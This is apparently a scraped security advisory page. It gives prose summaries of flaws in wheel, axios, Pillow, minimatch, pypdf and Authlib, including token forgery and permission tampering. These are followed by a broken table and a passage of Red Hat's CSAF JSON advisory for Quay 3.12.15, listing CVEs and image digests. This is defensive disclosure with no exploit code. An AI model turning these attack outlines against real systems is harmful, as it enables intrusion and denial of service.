A path traversal flaw has been discovered in the python wheel too. The unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.12.15 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.12.15",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:4942",
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24049",
"url": "https://access.redhat.com/security/cve/CVE-2026-24049"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27962",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_4942.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.12.15",
"tracking": {
"current_release_date": "2026-04-16T11:08:51+00:00",
"generator": {
"date": "2026-04-16T11:08:51+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:4942",
"initial_release_date": "2026-03-18T16:21:15+00:00",
"revision_history": [
{
"date": "2026-03-18T16:21:15+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-18T16:21:23+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:08:51+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.12",
"product": {
"name": "Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.12::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773766026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aa5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765467"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3Ac3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772132933"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3Af4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773775889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773761676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773771962"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765467"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Af15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Add1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773761676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773771962"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765467"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Ad547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773761676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773771962"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765467"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773765477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772054192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773761676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Ae39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773771962"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
